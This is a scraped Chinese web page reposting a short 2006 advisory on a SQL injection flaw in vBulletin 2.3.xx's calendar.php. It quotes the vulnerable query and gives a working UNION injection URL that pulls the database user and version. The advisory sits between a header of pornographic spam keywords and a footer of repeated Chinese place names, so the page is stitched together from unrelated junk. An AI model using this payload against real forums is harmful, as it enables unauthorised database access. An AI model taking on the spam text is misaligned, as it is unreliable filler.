最新国产好看的视频,伊人天堂AV在线,国产Aaaaaa视频,蜜臀视频在线观看一区,人妻av色图,密臀久久久精品影片,青青视频免费观看毛片,久草在线观看视,国产三级精品色情在线

vBulletin Forum 2.3.xx SQL Injection

 更新時間:2006年10月09日 00:00:00   作者:  

vBulletin Forum 2.3.xx SQL Injection There exist a sql injection problem in calendar.php.

-------- Cut from line 585 in calendar.php ----------
else if ($action == "edit")
{
      $eventinfo = $DB_site->query_first("SELECT allowsmilies,public,userid,
eventdate,event,subject FROM calendar_events WHERE eventid = $eventid");
-----------------------------------------------------

If the MySQL version is greater than 4.00, a UNION attack could be used.

-----------------------------------------
http://ww.xxx.com/bbs/calendar.php?action=edit&eventid=12%20union%20(SELECT%20allowsmilies,public,userid,'0000-0-0',user(),version()%20FROM%20calendar_ev
ents%20WHERE%20eventid%20=%2013)%20order%20by%20eventdate
-----------------------------------------

The query_first function will only return the first row of the query result, so make sure it returns !
the one you want.

相關(guān)文章

最新評論

大余县| 红桥区| 五常市| 鸡泽县| 昭通市| 西乌珠穆沁旗| 中西区| 贺州市| 永吉县| 新民市| 叶城县| 新乐市| 昔阳县| 杭锦后旗| 扶余县| 景谷| 普陀区| 平塘县| 甘孜县| 新巴尔虎左旗| 耒阳市| 耒阳市| 叶城县| 泊头市| 平安县| 从化市| 福建省| 德江县| 浏阳市| 丰台区| 封丘县| 三江| 南华县| 武夷山市| 青海省| 道孚县| 正安县| 贵港市| 加查县| 都昌县| 祁门县|